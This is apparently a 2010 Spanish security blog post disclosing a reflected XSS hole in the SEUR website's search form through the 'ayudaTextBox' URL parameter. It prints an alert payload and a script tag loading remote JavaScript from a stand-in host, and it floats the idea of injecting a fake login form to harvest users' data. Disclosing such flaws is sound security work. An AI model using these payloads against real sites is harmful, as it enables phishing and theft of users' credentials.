miércoles, 9 de junio de 2010

Wally paseandose por Seur

Wally vuelve a pasearse a sus anchas por otra página con XSS, en este caso, la web de SEUR.

El formulario del buscador no filtra la entrada del usuario que es mostrada como parte de la búsqueda por lo que cualquier script introducido será ejecutado como parte de la página, ya sea el típico

<script>alert("hola mundo")</script>

o algo más peligroso como

<script src="http://dominio.com/script.js"></script>


Lo peor de todo esto es que el parámetro del buscador esta accesible mediante la url de la página (parámetro ayudaTextBox) por lo que se puede incluir este script en un enlace y enviarlo a cualquier persona.


Sigo pensando que el XSS esta infravalorado ya que realmente se pueden hacer muchas maldades utilizando pequeños scripts ¿y si en lugar de poner una imagen mostrando al inocente Wally modificasemos el script para que mostrase un formulario de registro similar al de la propia web pero capturando los datos del usuario? ¿podriamos hacer "picar" en el engaño a alguno de los usuarios registrados... seguramente sí.

No hay comentarios:

Publicar un comentario